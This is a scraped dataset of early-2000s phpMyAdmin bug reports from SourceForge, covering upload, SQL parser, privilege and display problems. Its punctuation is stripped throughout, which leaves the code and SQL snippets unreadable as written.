CREATE TABLE accounting TimeStamp timestamp 14) NOT NULL, member id mediumint 8) unsigned NOT NULL default 0 , nickname char 15) NOT NULL default , email address char 60) NOT NULL default , membership type tinyint 1) unsigned NOT NULL default 0 , payment type tinyint 1) unsigned NOT NULL default 0 , premier expiration date date NOT NULL default 0000 00 00 , referring nickname char 25) NOT NULL default , referrer paid tinyint 1) unsigned NOT NULL default 0 , email bn char 6) NOT NULL default , promo code char 6) NOT NULL default , account created on date NOT NULL default 0000 00 00 , test member tinyint 1) unsigned NOT NULL default 0 , authcode int 11) unsigned NOT NULL default 0 , earn upgrade count tinyint 3) unsigned NOT NULL default 0 , earn upgrade count total tinyint 3) unsigned NOT NULL default 0 , photo extension given tinyint 1) unsigned NOT NULL default 0 , expiration warning tinyint 1) unsigned NOT NULL default 0 , earn money count tinyint 3) unsigned NOT NULL default 0 , earn money count total smallint 5) unsigned NOT NULL default 0 , popup congratulations tinyint 1) unsigned NOT NULL default 0 , email batch number smallint 4) unsigned NOT NULL default 0 , ccbill added tinyint 1) NOT NULL default 0 , ccbill deleted tinyint 1) unsigned NOT NULL default 0 , ccbill deleted timestamp timestamp 14) NOT NULL, ccbill upgrade requested timestamp 14) NOT NULL, ccbill pay term smallint 3) unsigned NOT NULL default 0 , ccbill pay recurrance tinyint 1) unsigned NOT NULL default 0 , ccbill pay amount smallint 5) unsigned NOT NULL default 0 , ccbill subscription id char 10) NOT NULL default , ccbill transaction id char 32) NOT NULL default , ccbill customer ip char 15) NOT NULL default , ccbill subscription char 50) NOT NULL default , ccbill cvv2 char 5) NOT NULL default , ccbill address1 char 50) NOT NULL default , ccbill phone number char 10) NOT NULL default , ccbill email char 25) NOT NULL default , ccbill customer fname char 25) NOT NULL default , ccbill customer lname char 25) NOT NULL default , ccbill nickname char 15) NOT NULL default , ccbill city char 25) NOT NULL default , ccbill state char 2) NOT NULL default , ccbill zipcode char 5) NOT NULL default , ccbill country char 32) NOT NULL default ) TYPE=MyISAM; Rob Peters Original URL https sourceforge.net p phpmyadmin bugs 419 https sourceforge.net p phpmyadmin bugs 419 Original author robpet","bug"
"24444","6789","2.2.6) uploading with open basedir active.
I apologize in advance if this is a bogus one server FreeBSD 4.4 Apache 1.3.22 PHP 4.1.2 virtual host open basedir in effect upload tmp dir is inside doc root Impossible to upload a file I got it working changing read dump.php this way Prepares the sql query Gets the query from a file if required if sql file != none ) \{ if file exists sql file) amp;amp; amp;amp; is uploaded file sql file)) \{ tmp uploaded = usr local psa home vhosts mydomain.com httpdocs php upload tmp tmp.txt ; move uploaded file sql file, tmp uploaded ); sql query = fread fopen tmp uploaded, r ), filesize tmp uploaded)); if get magic quotes runtime ) == 1) \{ sql query = stripslashes sql query); \} \} \} else if empty id bookmark) amp;amp; amp;amp; get magic quotes gpc ) == 1) \{ sql query = stripslashes sql query); \} Original URL https sourceforge.net p phpmyadmin bugs 420 https sourceforge.net p phpmyadmin bugs 420 Original author anonymous Found in version 2.2.6","bug"
"24444","6790","mangled db name when granting perms.
When attempting to grant permissions on a database with an underscore in the name, such as my database, the resulting data in the user interface shows the name as my\database, and if there were existing permissions for the user, they are destroyed for some reason.
I tried to update perms for an existing user on a database, and if the database has an amp;quot; amp;quot; in the name, I cannot get it to work.
Original URL https sourceforge.net p phpmyadmin bugs 421 https sourceforge.net p phpmyadmin bugs 421 Original author anonymous","bug"
"24444","6791","2.2.5) Undefined index tmp name.
I get the following error when I run sql queries using phpMyAdmin.
The queries seem to execute OK, and any output errors are shown after the following Warning Undefined index tmp name in D \Inetpub\wwwroot\engmulti\phpMyAdmin 2.2.5 \libraries\grab globals.lib.php on line 29 Depending on the query this may also be followed by Warning Cannot add header information headers already sent by output started at D \Inetpub\wwwroot\engmulti\phpMyAdmin 2.2.5 \libraries\grab globals.lib.php 29) in D \Inetpub\wwwroot\engmulti\phpMyAdmin 2.2.5 \libraries\ob.lib.php on line 53 The FAQ s give a solution to the error above removing whitespace) and there is a thread suggesting altering output buffering to On, but neither of these seem to work.
I m using nt4 sp6a rollup with iis4 amp;amp; phpMyadmin2.2.5.
Cookie authentication, with minimal alterations to config.inc.php ie set cookie cfgpmaAbsoluteUri mySQL running on localhost).
I get the errors using phpMyAdmin with ie5.5 and opera6.
thanks mike Original URL https sourceforge.net p phpmyadmin bugs 422 https sourceforge.net p phpmyadmin bugs 422 Original author anonymous Found in version 2.2.5","bug"
"24444","6792","Can t change row contents 2.2.5 amp; 2.2.6.
Hi, there exists a table where i can t change the contents of a row see example Attachment).
Thanks for your help.
Best regards, Kai.
Original URL https sourceforge.net p phpmyadmin bugs 423 https sourceforge.net p phpmyadmin bugs 423 Original author anonymous Found in version 2.2.6","bug"
"24444","6793","Can t change rowcontents with IE.
Hi, i try to change the conten of a row see attached SQL Dump) with IE 6.0 and get an error the Sceenshots).
With Netscape 4.7x and 6.0, Opera 6.0 and Mozilla 1.0 all works fine ;) Best regards, Kai.
Original URL https sourceforge.net p phpmyadmin bugs 424 https sourceforge.net p phpmyadmin bugs 424 Original author anonymous Found in version 2.2.6","bug"
"24444","6794","quot;Delete Button quot; doesn t work.
If there are many columns , the amp;quot;DELETE Button amp;quot; doesn t work.
There is still the PopUp Question alert), but the OK Button has no effect.
Original URL https sourceforge.net p phpmyadmin bugs 425 https sourceforge.net p phpmyadmin bugs 425 Original author anonymous Found in version 2.2.6","bug"
"24444","6795","2.2.6) CURDATE doesn t need any arguments.
Interface failed to update with this query when selecting the function amp;quot;curdate amp;quot; to update a field) UPDATE `USER` SET `last login` = CURDATE 2002 06 05 ) WHERE `id user` = 5 ; It seems there is a bug with implementation of mysql function CURDATE ) , this function doesn t need any arguments , the right query should be like UPDATE `USER` SET `last login` = CURDATE ) WHERE `id user` = 5 ; Original URL https sourceforge.net p phpmyadmin bugs 426 https sourceforge.net p phpmyadmin bugs 426 Original author anonymous Found in version 2.2.6","bug"
"24444","6796","2.2.6) pointer broken in galeon 1.2.3, fixed.
in galeon 1.2.3, when rolling over the rows, the colour goes white and doesn t come back, as if mouseout and mousedown aren t being honored.
I think I managed to fix it though in file libraries display tbl.lib.php, lines 773, 774, and 777 need semicolons at the end of the setPointer calls, like such on mouse = onmouseover= [...] \ ); amp;quot; Original URL https sourceforge.net p phpmyadmin bugs 427 https sourceforge.net p phpmyadmin bugs 427 Original author rhornsby Found in version 2.2.6","bug"
"24444","6797","2.3.0 rc2) Wildcards escaped in db name.
Wildcards amp;quot; amp;quot; and amp;quot; amp;quot;) in allowed database names are not unescaped in the Create new database field on the main.php3 page.
If you have a MySQL privilege like GRANT ALL PRIVILEGES ON user\ .
TO user there are two underscores after the backslash) then the user user can create databases that are named user ?
user followed by an underscore and any character).
But the Create new database field, on the main.php3 page, displays user\ ?
.
What I can see is this fixed in main.php3 v 1.105) for PMA MYSQL INT VERSION amp;lt; 32304 but not for versions above.
Replace line 221 re = | \\\\\\\\) |[ \]) ; with re0 = | \\\\\\\\) |[ \]) ; non escaped wildcards re1 = |[ \]) \\\) ; escaped wildcards and replace lines 232 233 show grants dbname = ereg replace re .
, \\1... , ereg replace re .
, \\1?
, show grants dbname)); db to create = show grants dbname; with db to create = ereg replace re0 .
, \\1... , ereg replace re0 .
, \\1?
, show grants dbname)); db to create = ereg replace re1 .
| ) , \\1\\3 , db to create); Compare with lines 195 196 and 200 201.
Original URL https sourceforge.net p phpmyadmin bugs 428 https sourceforge.net p phpmyadmin bugs 428 Original author bth Found in version 2.3.0 rc2","bug"
"24444","6798","2.3.0 dev) Error when missing pdf pages.
The following is displayed on the db details structure.php3 page when the selected database doesn t have a pdf pages table Edit PDF Pages Error SQL query SELECT FROM `PMA pdf pages` MySQL said Table db2.PMA pdf pages doesn t exist This happens for example if you are using one database with a pdf pages table and also have another database without a pdf pages table and a table coords table).
Suggested fix Replace line 455 in db details structure.php3 v 1.13) test rs = mysql query test query) or PMA mysqlDie , test query, , err url 0); with test rs = mysql query test query); if test rs) \{ and add an end if below line 482.
Also move the section amp;lt;!
Work on PDF Pages amp;gt; lines 442 451) inside the new if statement before line 456).
Original URL https sourceforge.net p phpmyadmin bugs 429 https sourceforge.net p phpmyadmin bugs 429 Original author bth","bug"
"24444","6799","2.3.0 dev) Grant Option hardcoded.
The string Grant Option is hardcoded in user details.php3 v 1.70), line 64.
Original URL https sourceforge.net p phpmyadmin bugs 430 https sourceforge.net p phpmyadmin bugs 430 Original author bth","bug"
"24444","6800","2.3.0 rc4) Load Infile and PHP 4.2.1.
I have noticed that on a few different machines with PHP 4.2.1, that the Load Data from Textfile does not work.
For some reason, even if you have your tmp directory set with full permissions, it creates the temp file with only read write for root.
A quick fix is to just put the following line near the top of ldi check.php chmod textfile, 0777); If there is another way around this problem, please email me.
Thanks Original URL https sourceforge.net p phpmyadmin bugs 431 https sourceforge.net p phpmyadmin bugs 431 Original author anonymous Found in version 2.3.0 rc1","bug"
"24444","6801","2.2.6) function redeclare, PHP 4.2.1. system env.
apache 1.3.24 php 4.2.1 Zend Acc 2.0.2 phpMyAdmin 2.2.4 php compile configuration .
configure with mysql= usr local mysql with apache=.. apache 1.3.24 with gd= usr enable track vars with sybase= opt sybase 11.9.2 enable inline optimization disable debug with ming enable ftp with xml with iconv= usr local enable xslt with expat dir= usr with xslt sablot= usr with sablot js enable wddx with zlib dir= usr with jpeg dir= usr with png dir= usr with freetype dir= usr enable mbstring enable mbregex upgrade php from 4.2.0 to 4.2.1, and add some parameters to comile it enable ftp with xml with iconv= usr local enable xslt with expat dir= usr with xslt sablot= usr with sablot js enable wddx with zlib dir= usr with jpeg dir= usr with png dir= usr with freetype dir= usr enable mbstring enable mbregex and then a guy report that the phpMyAdmin have an error occurs Fatal error Cannot redeclare ) previously declared in home inetpub sunadm libraries common.lib.php 204) in home inetpub sunadm header.inc.php on line 8 then i upgrade phpMyAdmin from 2.2.4 to 2.2.6, but error also there.
then i replace all the require and the include statement to the require once and include once , it s ok now Original URL https sourceforge.net p phpmyadmin bugs 432 https sourceforge.net p phpmyadmin bugs 432 Original author sunadm Found in version 2.2.4","bug"
"24444","6802","duplicate) Syntax error lang russian koi8.inc.php.
Simple syntax error at file lang russian koi8.inc.php, line 232.
To fix, please move single quoute ) from the middle to the end of 232 d line but before leading semicolon ;) This error reveals himself only if you have russian koi8 language choosen.
Original URL https sourceforge.net p phpmyadmin bugs 433 https sourceforge.net p phpmyadmin bugs 433 Original author anonymous Found in version 2.2.6","bug"
"24444","6803","2.3.0) SQL Parser doesn t recognize query.
The SQL Colorizing parser claims Missing Bracket SQL query CREATE TABLE `relation` `master db` varchar 64 ) NOT NULL default Relationtable See the screenshot attached for a better understanding.
The query is the relation table creation query from the Documentation.html Original URL https sourceforge.net p phpmyadmin bugs 434 https sourceforge.net p phpmyadmin bugs 434 Original author robbat2 Found in version 2.3.0 rc2","bug"
"24444","6804","2.3.0) SQL Parser doesn t colour properly.
Yo Another bug in the SQL colorizing parser.
This is the query CREATE TABLE `a` `a` TIMESTAMP NOT NULL, `b` VARCHAR 255) , `c` DOUBLE, PRIMARY KEY `a`)); The DOUBLE is not coloured.
Again, see screenshot.
Original URL https sourceforge.net p phpmyadmin bugs 435 https sourceforge.net p phpmyadmin bugs 435 Original author robbat2 Found in version 2.3.0 rc2","bug"
"24444","6805","2.3.0) Relation table bug.
CREATE TABLE a a timestamp 14) NOT NULL, b varchar 255) default NULL, c double default NULL, PRIMARY KEY a) ) TYPE=MyISAM COMMENT= Foo ; CREATE TABLE b a timestamp 14) NOT NULL, b varchar 255) default NULL, c double default NULL, PRIMARY KEY a) ) TYPE=MyISAM; Create relation on table a to b amp;gt;a And get an SQL error about the keys.
See Screenshot.)
Original URL https sourceforge.net p phpmyadmin bugs 436 https sourceforge.net p phpmyadmin bugs 436 Original author robbat2","bug"
"24444","6806","2.3.0) QBE Behavior with ordering.
Using Query By Example, set your field to the A. to get all the columns, and then try to use the sort field.
The generated query is SELECT `a`.
FROM `a` ORDER BY `a`.
ASC Which is actually invalid, due to the order by clause containing a Original URL https sourceforge.net p phpmyadmin bugs 437 https sourceforge.net p phpmyadmin bugs 437 Original author robbat2 Found in version 2.3.0 rc1","bug"
"24444","6807","2.3.0) MAJOR colorizer bug.
just from looking at the colourizing code, I wondered what would happen with a specific query.
SQL Query fragment CREATE TABLE bar1 bar text NOT NULL ) TYPE=MyISAM; INSERT INTO bar1 VALUES I\ m a little teapot.
Short and STOUT.
= =.\r\n,,,,, commas ;;;;; semi colons\r\nSELECT DATABASE TABLE DOUBLE \r\n ); Output CREATE TABLE bar1 bar text NOT NULL ) TYPE=MyISAM; INSERT INTO bar1 VALUES I\ malittleteapot.ShortandSTOUT.= =.\r\n,,,,,commas;;; ;;semi colons\r\nSELECTDATABASETABLEDOUBLE\r\n ) This will TOTALLY strip the spaces in the displayed query, which destroys the string that is displayed.
Part two Using the previous table, go to manually insert a row, and use this for your data I m a little teapot.
Short and STOUT.
= =.
,,,,, commas ;;;;; semi colons SELECT DATABASE TABLE DOUBLE Here is the output INSERT INTO `bar1` `bar` ) VALUES ) ; We have lost the ENTIRE string.
The flaw is a major design flaw in the code with regards to the way that quotes amp;quot; ` ) are handled.
At the moment the format parser breaks down the query at the start.
Instead of doing that, we need to work thru the query character by character.
Original URL https sourceforge.net p phpmyadmin bugs 438 https sourceforge.net p phpmyadmin bugs 438 Original author robbat2 Found in version 2.3.0 rc2","bug"
"24444","6808","Problems with bytecode caches.
i just tried almost all versions from 2.2.0 2.3.0rc1) phpMyAdmin can t work with Zend Accelerator properly it alway tells me that functions is redeclare i guess something goes wrong in common.lib.php or other files require it.
Original URL https sourceforge.net p phpmyadmin bugs 439 https sourceforge.net p phpmyadmin bugs 439 Original author anonymous Found in version 2.3.1","bug"
"24444","6809","2.3.0 rc1) Error in DROP TABLE link.
In tbl properties links.php,v 1.14 2002 05 05 08 28 43, line 55 amp;quot; .
sub part .
amp;quot; has not the desired effect outside of amp;lt;?php and ?
amp;gt; I already fixed the bug during the implementation of the tabbed navigation Patch Request ID 571426).
Original URL https sourceforge.net p phpmyadmin bugs 440 https sourceforge.net p phpmyadmin bugs 440 Original author jfornall Found in version 2.3.0 rc1","bug"
"24444","6810","2.3.0 rc1)foreign db in relation table don t work.
When I set a foreign db in the relation table, it don t links to the foreign db.
Only to the current db.
Original URL https sourceforge.net p phpmyadmin bugs 441 https sourceforge.net p phpmyadmin bugs 441 Original author j0erch Found in version 2.3.0 rc1","bug"
"24444","6811","2.3.0 rc1) Wrong goto link tbl properties structure.
On tbl properties structure.php because of the tbl properties common.php the url query has the wrong goto after subimting an ALTER TABLE query from the links.
After dropping a field, making primary, unique, etc.
the links refirect to the query box page.
I believe this is the wrong place at least i don t like it).
Instead it should go back to the table structure page.
My fix for it is to replace the following line in tbl properties structure.php After require .
tbl properties common.php ); err url = tbl properties structure.php .
err url; Replace url query .= amp;amp;amp;back=tbl properties structure.php ; With url query .= amp;amp;amp;goto=tbl properties structure.php amp;amp;a mp;back=tbl properties structure.php ; The second amp;amp;goto will replace the first in the url.
Original URL https sourceforge.net p phpmyadmin bugs 442 https sourceforge.net p phpmyadmin bugs 442 Original author anonymous Found in version 2.3.0 rc1","bug"
"24444","6812","2.3.0 rc1) Printing problem.
I have the latest version of phpmyadmin install on my servers.
When I print from Explorer 6 on a Windows 2000 machine a blank page is always printed a the end.
I found that in the html source the amp;lt;div amp;gt; tag is present but not the amp;lt; div amp;gt; tag.
The tag amp;lt;div style= amp;quot;page break after always; amp;quot; amp;gt; is the source of the problem!
I don t need some help but i would be happy if this amp;quot;bug amp;quot; could be foxed in the future version of the project.
Original URL https sourceforge.net p phpmyadmin bugs 443 https sourceforge.net p phpmyadmin bugs 443 Original author anonymous Found in version 2.3.0 rc1","bug"
"24444","6813","2.3.0 rc1) Have no file end code.
lithuanian.inc.php have no file end code amp;quot;0a amp;quot;.
it couse problems then select lithuanian language.
Things todo open file lithuanian.inc.php and save with correct one.
Original URL https sourceforge.net p phpmyadmin bugs 444 https sourceforge.net p phpmyadmin bugs 444 Original author algisv Found in version 2.3.0 rc1","bug"
"24444","6814","Grant underscore in a db name.
When I grant privileges to a database fro a user if the database name contains an underscore, it adds a baclslashe before the underscore and store the database name this way, making it useless.
Original URL https sourceforge.net p phpmyadmin bugs 445 https sourceforge.net p phpmyadmin bugs 445 Original author penseweb Found in version 2.2.6","bug"
"24444","6815","2.3.0 rc1) Bad unmarking of rows with Mozilla.
When unmarking row in browse mode in Mozilla 1.0 it has pointer color, not the original for even odd row.
It works this way for longer time probably all Mozilla 1.0rc and PMA 2.3.0 cvs).
In Konqueror 3.0 it works correctly.
Original URL https sourceforge.net p phpmyadmin bugs 448 https sourceforge.net p phpmyadmin bugs 448 Original author nijel Found in version 2.3.0 rc1","bug"
"24444","6816","Duplicate) Page break when printing.
Under IE 6 and any printer using printview on a table, it always print a blank page.
The buggy code is amp;lt;div style= amp;quot;page break after always; amp;quot; amp;gt; I don t see why it is there.
Original URL https sourceforge.net p phpmyadmin bugs 446 https sourceforge.net p phpmyadmin bugs 446 Original author penseweb Found in version 2.2.6","bug"
"24444","6817","2.3.0 rc1) CONCAT without field parser analyzer).
hello, when i make a query like SELECT concat to , to ) I get this error SELECT master field, foreign db, foreign table, foreign field FROM `relations` WHERE master db = db name AND master table IN SELECT concat to , to ) ) pma try to check whether there are relations between table but there are no tables ...
I know my first query is not useful but it should works.
bye Original URL https sourceforge.net p phpmyadmin bugs 447 https sourceforge.net p phpmyadmin bugs 447 Original author chaume92 Found in version 2.3.0 rc1","bug"
"24444","6818","2.3.0 rc1) XHTML not valid.
I validated the page of an empty table using my local server http phpmyadmin tbl properties.php?lang=en amp;amp;convcharset=iso 8859 1 amp;amp;server=1 amp;amp;db=phpMyAdmin amp;amp;table=relation which gave following errors Warning No Character Encoding detected!
amp;lt;textarea name= amp;quot;sql query amp;quot; rows= amp;quot;7 amp;quot; cols= amp;quot;80 amp;quot; wrap= amp;quot;virtual amp;quot;; Error there is no attribute amp;quot;wrap amp;quot; for this element in this HTML version) Original URL https sourceforge.net p phpmyadmin bugs 449 https sourceforge.net p phpmyadmin bugs 449 Original author ci dev Found in version 2.3.0 rc1","bug"
"24444","6819","2.3.0 rc1) create php code bug.
In Structure view I created an index for a field.
Then I clicked on Create PHP Code and checked Structure view again There are two Keys created each time I click on Create PHP Code or Without PHP Code , a new key is created.
Original URL https sourceforge.net p phpmyadmin bugs 450 https sourceforge.net p phpmyadmin bugs 450 Original author ci dev Found in version 2.3.0 rc1","bug"
"24444","6820","2.3.0 rc1) Bug with CHAR field type.
When I create a CHAR field the result is creating a VARCHAR field...
Original URL https sourceforge.net p phpmyadmin bugs 451 https sourceforge.net p phpmyadmin bugs 451 Original author anonymous Found in version 2.3.0 rc1","bug"
"24444","6821","Problem exporting CSV in Netscape.
Hi, Don t know if this is a problem in 2.3.0 rc1, but when I use IE 5.5 to export a table to a CSV file, everything works great.
When I do the exact same thing in Netscape 4.5, I get empty rows between each row of data in the CSV file when I open it up in Excel.
Don t know what s going on there...
Original URL https sourceforge.net p phpmyadmin bugs 452 https sourceforge.net p phpmyadmin bugs 452 Original author grapeice925 Found in version 2.3.0 rc1","bug"
"24444","6822","2.3.0 rc1) tables not linked are missing in PDF.
when you amp;quot;Display PDF schema amp;quot; any tables that do not have a relation are not shown on the digram, i am not sure if this is intentional, but i think it would be much better if all tables that you set with the edit pdf pages bit are shown on the digram Original URL https sourceforge.net p phpmyadmin bugs 453 https sourceforge.net p phpmyadmin bugs 453 Original author anonymous Found in version 2.3.0 rc1","bug"
"24444","6823","2.3.0 rc1) Edit PDF delete arror.
i get this when i update the pdf page Notice Undefined index delete in C \Program Files\Apache Group\Apache2\htdocs\phpMyAdmin\pdf pages.php on line 71 my guess is that it just missing an if for when no deletes are made Original URL https sourceforge.net p phpmyadmin bugs 454 https sourceforge.net p phpmyadmin bugs 454 Original author thrasher6669 Found in version 2.3.0 rc1","bug"
"24444","6824","2.3.0 rc1) no menu at query by example.
After selecting a database and clicking on Query by Example the menu in the right frame disappears the one with SQL, Structure, Export... ).
I think this is a bug.
Original URL https sourceforge.net p phpmyadmin bugs 455 https sourceforge.net p phpmyadmin bugs 455 Original author ci dev Found in version 2.3.0 rc1","bug"
"24444","6825","2.2.6) ANSI form of SUBSTRING function.
Try something like SELECT SUBSTRING name FROM 1 FOR 3) FROM table It s a strange, but legal Mysql query and the result is OK despite the warnings Original URL https sourceforge.net p phpmyadmin bugs 456 https sourceforge.net p phpmyadmin bugs 456 Original author svetlio","bug"
"24444","6826","2.3.0 rc1) relation missing keys in drop down.
I have a table members with an unique ID called ID auto increment) and a field called RefererID , which points to a member ID, but it is not listed in the dropdown menu.
Original URL https sourceforge.net p phpmyadmin bugs 457 https sourceforge.net p phpmyadmin bugs 457 Original author ci dev Found in version 2.3.0 rc1","bug"
"24444","6827","2.3.0 rc1) relation and ORDER BY.
I have defined a relation for a certain column but if I let pma sort by any column the relation link will no longer be shown.
Original URL https sourceforge.net p phpmyadmin bugs 458 https sourceforge.net p phpmyadmin bugs 458 Original author ci dev Found in version 2.3.0 rc1","bug"
"24444","6828","2.3.0 rc1) wrong counted rows with many functions.
SELECT SUM colname) FROM table shows wrong total rows count there is only one row in the result) as well as SELECT AVG colname) FROM table SELECT MIN colname) FROM table SELECT MAX colname) FROM table SELECT STD colname) FROM table SELECT STDDEV colname) FROM table SELECT BIT OR colname) FROM table Original URL https sourceforge.net p phpmyadmin bugs 459 https sourceforge.net p phpmyadmin bugs 459 Original author svetlio","bug"
"24444","6829","2.3.0 rc1) select all doesn t work without javascript.
amp;quot;Select All amp;quot; and amp;quot;Unselect All amp;quot; links are broken using amp;quot;Export amp;quot; to export a database.
This is no problem until one turns off JavaScript.
Links in question are amp;lt;a href= amp;quot; amp;amp;amp;selectall=1 dumpdb amp;quot; [...] amp;gt;Select All amp;lt; a amp;gt; amp;lt;a href= amp;quot; dumpdb amp;quot; [...] amp;gt;Unselect All amp;lt; a amp;gt; Original URL https sourceforge.net p phpmyadmin bugs 460 https sourceforge.net p phpmyadmin bugs 460 Original author ci dev Found in version 2.3.0 rc1","bug"
"24444","6830","2.3.0 rc2) Error with MySQL expressions in field names.
I have a table with field name amp;quot;front load amp;quot; and amp;quot;order limit amp;quot;.
When I do a SELECT on the table PHPMyAdmin gives me an error since 2.3.0 RC2 It changes the Field name to front LOAD and order LIMIT and add a space.
MySQL said Unbekanntes Tabellenfeld front LOAD in field list.
Original URL https sourceforge.net p phpmyadmin bugs 461 https sourceforge.net p phpmyadmin bugs 461 Original author j0erch Found in version 2.3.0 rc2","bug"
"24444","6831","2.3.0 rc2) Uninitialized string offset.
Warning Uninitialized string offset 0 in phpMyAdmin libraries display tbl.lib.php on line 1396 Original URL https sourceforge.net p phpmyadmin bugs 462 https sourceforge.net p phpmyadmin bugs 462 Original author anonymous Found in version 2.3.0 rc2","bug"
"24444","6832","2.3.0 rc2) no modify a row after SELECT.
error when trying to modify a row in a table with many fields after doing a SELECT.
The table has 64 fields and a PRIMARY KEY!
SQL query SE MySQL said Fehler in der Syntax bei SE in Zeile 1.
Browser IE 5.0 Original URL https sourceforge.net p phpmyadmin bugs 463 https sourceforge.net p phpmyadmin bugs 463 Original author j0erch Found in version 2.3.0 rc2","bug"
"24444","6833","2.3.0 rc2) edit link not clickable IE6.
The edit link is not clickable after doing a SELECT on a table with many fields With amp;quot;Open In a new Window amp;quot; I get it to work, but with the result I described in BUG 575875.
The table has 64 fields and a PRIMARY KEY!
Browser IE6 on NT4 SP6 Original URL https sourceforge.net p phpmyadmin bugs 464 https sourceforge.net p phpmyadmin bugs 464 Original author j0erch Found in version 2.3.0 rc2","bug"
"24444","6834","2.3.0 rc2) Aesthetics for Action Tabs.
The new Action Tabs in 2.3.0 rc2 are a nice addition but I can t help feeling that some additional vertical spacing is required between the dividing line and the content beneath it.
Additionally, following the SQL Tab, the text amp;quot;Run SQL query queries on database ... amp;quot; has a bullet character preceeding it.
This is inconsistent with the content under the other tabs.
I know these are picky little details but, as you probably have seen from my previous reports, it s just my perfectionist nature ) Regards, Neil Darlow M.Sc.
Original URL https sourceforge.net p phpmyadmin bugs 465 https sourceforge.net p phpmyadmin bugs 465 Original author anonymous Found in version 2.3.0 rc2","bug"
"24444","6835","2.3.0 CVS) Undefined varaible in tbl qbe.php3.
When I call tbl qbe.php3, I get a php error about an undefined variable Warning Undefined variable sub part in [pma dir] db details links.php3 on line 35 Original URL https sourceforge.net p phpmyadmin bugs 471 https sourceforge.net p phpmyadmin bugs 471 Original author rabus Found in version 2.3.0 rc2","bug"
"24444","6836","2.3.0 rc2) Are those bullets necessary?.
In Bug 575956 I described an inconsistent bullet on the SQL form.
Looking at the content of various pages throughout phpMyAdmin I wonder whether bullets are relevant anymore?
Viewing the Operations and Options pages for a Table shows bullets on blank lines making them look rather peculiar Mozilla 1.0.0 Linux).
I understand that some of these page views are used in both Database and Table modes and appear different, bullet wise, for each but they either need cleaning up or removing altogether.
Regards, Neil Darlow M.Sc.
Original URL https sourceforge.net p phpmyadmin bugs 466 https sourceforge.net p phpmyadmin bugs 466 Original author ndarlow Found in version 2.3.0 rc2","bug"
"24444","6837","2.3.0 rc2) Parse Error libraries common.lib.php3.
Parse Error on Line 73 in .
libraries common.lib.php3 V 1.111 PHP 4.1.2 Original URL https sourceforge.net p phpmyadmin bugs 467 https sourceforge.net p phpmyadmin bugs 467 Original author nagipeters Found in version 2.3.0 rc2","bug"
"24444","6838","Annoying cfg[ PmaAbsoluteUri ].
Ok, I ll be honest, I don t like this.
With 2.2.X, it was perfectly fine to have phpmyadmin installed somewhere on the server and then have the users use aliases and whatever they like to access it under their own domains space we allowed userdomain.com phpmyadmin and phpmyadmin.userdomain.com for example).
With the cfg[ PmaAbsoluteUri ] directive this seems no longer possible.
If you use ., IE won t work due to some IE bug I suspect cause Mozilla does work) because it creates bogus URLs of the form http file?param instead of just .
file.
Now if you just leave it empty, everything works fine again but you get to see that annoying red warning that you should set it.
The question I have is why would I want to set it, anyway?
I mean it works fine without it and doesn t entirely do what we want with it?
Is there any chance that this error AFAI can tell, there s no need for it at all) is going away or will I have to patch it by hand?
Original URL https sourceforge.net p phpmyadmin bugs 468 https sourceforge.net p phpmyadmin bugs 468 Original author anonymous Found in version 2.3.0 rc1","bug"
"24444","6839","changing enum options and table name.
bug in table properties editor when trying to rename table and change enum options simultaneously phpMYAdmin comes up with the wron default value for the enum field the option user is no longer available).
see produced sql below.
ALTER TABLE `quiz`.`quiz` CHANGE `result output method` `results output method` ENUM client , email ) DEFAULT user NOT NULL phil Original URL https sourceforge.net p phpmyadmin bugs 469 https sourceforge.net p phpmyadmin bugs 469 Original author anonymous","bug"
"24444","6840","2.3.0 rc2) table does not exist.
There are two table contained amp;quot;data amp;quot; tablename is cdr data and ACF data) in my database.But I don t browse their with phpMyAdmin 2.3.0 rc2.The error is listed as following.
Database billing table cdr DATA running on localhost Error SQL query SELECT FROM `cdr DATA ` ORDER BY ` id` ASC LIMIT 0, 30 MySQL said Table billing.cdr DATA doesn t exist Back Table not contained amp;quot;data amp;quot;,example amp;quot;temp card amp;quot;) in my database can browse with phpMyAdmin2.3.0 rc2.
I think that it is a bug in phpMyAdmin.
Original URL https sourceforge.net p phpmyadmin bugs 470 https sourceforge.net p phpmyadmin bugs 470 Original author szsailing Found in version 2.3.0 rc2","bug"
"24444","6841","2.3.0 rc2) Auto Upcase table becomes TABLE.
i find this problem in 2.3.0 rc 2 and rc 3 is still exist.
when using amp;quot;SELECT MENU amp;quot; to query data, some term such as amp;quot;DATA amp;quot;, amp;quot;FROM amp;quot; is auto upcased include those term using in the table name, field name.
eg.
if i have a field name call amp;quot;payment from amp;quot; and the table is call amp;quot;payment data amp;quot; , after using amp;quot;SELECT MENU amp;quot; for query.
SQL query statement will be SELECT payment FROM from payment DATA where .......
Original URL https sourceforge.net p phpmyadmin bugs 472 https sourceforge.net p phpmyadmin bugs 472 Original author siusun Found in version 2.3.0 rc2","bug"
"24444","6842","2.3.0 rc2) display problem with en utf8.
I ve set pma to use en utf8 charset but in german language there are characters like umlaut u and others xc3xa4xc3xb6xc3xbcxc3x9f) which aren t displayed correctly.
Maybe they should be converted into proper HTML entities?
Original URL https sourceforge.net p phpmyadmin bugs 473 https sourceforge.net p phpmyadmin bugs 473 Original author ci dev Found in version 2.3.0 rc2","bug"
"24444","6843","2.3.0 rc2) ShowAll.
It doesn t seem to work properly In my config file cfg[ ShowAll ] = TRUE; whether TRUE or not the ShowAll button doesn t appear Original URL https sourceforge.net p phpmyadmin bugs 474 https sourceforge.net p phpmyadmin bugs 474 Original author mdelorme Found in version 2.3.0 rc2","bug"
"24444","6844","master table.
When i copy the sql from the doc in PMA CREATE TABLE `relation` `master db` varchar 64) NOT NULL default , `master table` varchar 64) NOT NULL default , `master field` varchar 64) NOT NULL default , `foreign db` varchar 64) NOT NULL default , `foreign table` varchar 64) NOT NULL default , `foreign field` varchar 64) NOT NULL default , PRIMARY KEY `master db`,`master table`,`master field`), KEY foreign field foreign db,foreign table) ) TYPE=MyISAM COMMENT= Relation table ; the master table field in convert into master TABLE and so the `master field` into ` master field`.
If I change for master dummy the name of the master table then it s `foreign table` amp;gt; `foreign TABLE` with `foreign field` amp;gt; ` foreign field` Original URL https sourceforge.net p phpmyadmin bugs 475 https sourceforge.net p phpmyadmin bugs 475 Original author mdelorme Found in version 2.3.0 rc2","bug"
"24444","6845","pdf schema.
when I want to see a pdf schema with only one table.
I have the error msg Undefined PDF page number!
I could be very usefull to have when editing table coords a link to pdf output as it is on the structure tab Original URL https sourceforge.net p phpmyadmin bugs 476 https sourceforge.net p phpmyadmin bugs 476 Original author mdelorme Found in version 2.3.0 rc2","bug"
